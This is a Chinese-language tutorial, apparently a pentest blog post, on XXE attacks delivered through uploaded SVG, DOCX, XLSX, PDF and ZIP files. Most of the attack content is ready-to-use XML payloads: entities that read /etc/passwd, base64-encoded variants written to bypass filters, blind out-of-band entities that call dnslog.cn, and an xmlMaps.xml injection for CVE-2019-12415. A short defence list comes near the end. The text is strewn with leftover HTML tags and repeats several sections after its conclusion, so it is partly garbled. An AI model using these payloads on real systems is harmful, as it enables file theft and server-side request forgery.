XXE在文件上传中的应用详解<\/h1>

1. XXE基础概念<\/h2>
XXE (XML External Entity) 攻击是一种利用XML解析器处理外部实体时的漏洞进行攻击的技术。攻击者可以通过构造恶意的XML文档，读取服务器上的敏感文件、发起SSRF攻击或执行其他恶意操作。<\/p>

2. 有回显的XXE攻击<\/h2>

2.1 基本利用方式<\/h3>

<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY test SYSTEM 'file:\/\/\/etc\/passwd'><\/span> 
<\/span><\/span>]>
<\/span><\/span><root><\/span>&test;<\/root><\/span>
<\/span><\/span><\/code><\/pre>2.2 Base64绕过方式<\/h3>
<!DOCTYPE test [
<\/span><\/span><\/span><!ENTITY % init SYSTEM "data:\/\/text\/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"><\/span>
<\/span><\/span>%init;
<\/span><\/span>]>
<\/span><\/span><foo\/><\/span>
<\/span><\/span><\/code><\/pre>3. 无回显的XXE攻击<\/h2>
3.1 基本利用方式<\/h3>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY % ext SYSTEM "http:\/\/dnslog.cn"><\/span>
<\/span><\/span>%ext;
<\/span><\/span>]>
<\/span><\/span><r><\/r><\/span>
<\/span><\/span><\/code><\/pre>或<\/p>
<!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY test SYSTEM 'http:\/\/dnslog.cn'><\/span> 
<\/span><\/span>]>
<\/span><\/span><root><\/span>&test;<\/root><\/span>
<\/span><\/span><\/code><\/pre>3.2 Base64绕过方式<\/h3>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span><!ENTITY % ext SYSTEM "data:\/\/text\/plain;base64,aHR0cDovL2Ruc2xvZy5jbg=="><\/span>
<\/span><\/span>%ext;
<\/span><\/span>]>
<\/span><\/span><r><\/r><\/span>
<\/span><\/span><\/code><\/pre>4. 文件上传中的XXE利用<\/h2>
4.1 SVG格式中的XXE<\/h3>
SVG文件本质上是XML文件，可以包含XXE payload：<\/p>
<?xml version="1.0" standalone="yes"?><\/span>
<\/span><\/span><!DOCTYPE test [
<\/span><\/span><\/span><!ENTITY xxe SYSTEM "http:\/\/dnslog.cn" ><\/span>
<\/span><\/span>]>
<\/span><\/span><svg<\/span> width=<\/span>"128px"<\/span> height=<\/span>"128px"<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span> xmlns:xlink=<\/span>"http:\/\/www.w3.org\/1999\/xlink"<\/span> version=<\/span>"1.1"<\/span>><\/span>
<\/span><\/span><text<\/span> font-size=<\/span>"16"<\/span> x=<\/span>"0"<\/span> y=<\/span>"16"<\/span>><\/span>&xxe;<\/text><\/span>
<\/span><\/span><\/svg><\/span>
<\/span><\/span><\/code><\/pre>4.2 DOCX格式中的XXE<\/h3>
DOCX文件实际上是ZIP压缩包，包含多个XML文件。可以使用工具自动注入XXE payload：<\/p>
推荐工具：whitel1st\/docem - 一个在docx、odt、pptx、xlsx文件中嵌入XXE和XSS payload的工具。<\/p>
4.3 Excel格式中的XXE<\/h3>
Excel文件可能通过以下方式解析XML：<\/p>

Apache POI解析器

CVE-2014-3529：可直接使用docem工具生成payload<\/li>
CVE-2019-12415：需要编辑xmlMaps.xml文件<\/li>
<\/ul>
<\/li>
<\/ol>
对于CVE-2019-12415，可在xmlMaps.xml文件中插入：<\/p>
<xsd:redefine<\/span> schemaLocation=<\/span>"http:\/\/dnslog.cn\/"<\/span>><\/xsd:redefine><\/span>
<\/span><\/span><\/code><\/pre>4.4 PDF格式中的XXE<\/h3>
某些PDF文件包含XML标签，可以尝试插入无回显的XXE payload。<\/p>
4.5 压缩文件中的XXE<\/h3>

压缩文件中必须包含XML文件<\/li>
上传压缩文件后，在Burp Suite中抓包修改，插入XXE payload<\/li>
<\/ol>
5. 防御建议<\/h2>

禁用XML外部实体解析<\/li>
对上传文件进行严格的内容检查<\/li>
使用白名单验证文件类型<\/li>
对XML解析器进行安全配置<\/li>
<\/ol>
6. 总结<\/h2>
在渗透测试中，应重点关注文件上传功能点，特别是：<\/p>

任何包含XML标签的文件格式<\/li>
支持SVG、DOCX、XLSX、PDF等格式的文件上传<\/li>
使用压缩文件上传的场景<\/li>
<\/ul>
参考来源：blackhat.com\/docs\/webcast\/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf<\/p>

XXE在文件上传中的应用详解<\/h1>

1. XXE基础概念<\/h2> XXE (XML External Entity) 攻击是一种利用XML解析器处理外部实体时的漏洞进行攻击的技术。攻击者可以通过构造恶意的XML文档，读取服务器上的敏感文件、发起SSRF攻击或执行其他恶意操作。<\/p>

2. 有回显的XXE攻击<\/h2>

3. 无回显的XXE攻击<\/h2>

4. 文件上传中的XXE利用<\/h2>

4.2 DOCX格式中的XXE<\/h3> DOCX文件实际上是ZIP压缩包，包含多个XML文件。可以使用工具自动注入XXE payload：<\/p> 推荐工具：whitel1st\/docem - 一个在docx、odt、pptx、xlsx文件中嵌入XXE和XSS payload的工具。<\/p>

4.4 PDF格式中的XXE<\/h3> 某些PDF文件包含XML标签，可以尝试插入无回显的XXE payload。<\/p>

1. XXE基础概念<\/h2>
XXE (XML External Entity) 攻击是一种利用XML解析器处理外部实体时的漏洞进行攻击的技术。攻击者可以通过构造恶意的XML文档，读取服务器上的敏感文件、发起SSRF攻击或执行其他恶意操作。<\/p>

4.2 DOCX格式中的XXE<\/h3>
DOCX文件实际上是ZIP压缩包，包含多个XML文件。可以使用工具自动注入XXE payload：<\/p>
推荐工具：whitel1st\/docem - 一个在docx、odt、pptx、xlsx文件中嵌入XXE和XSS payload的工具。<\/p>

4.4 PDF格式中的XXE<\/h3>
某些PDF文件包含XML标签，可以尝试插入无回显的XXE payload。<\/p>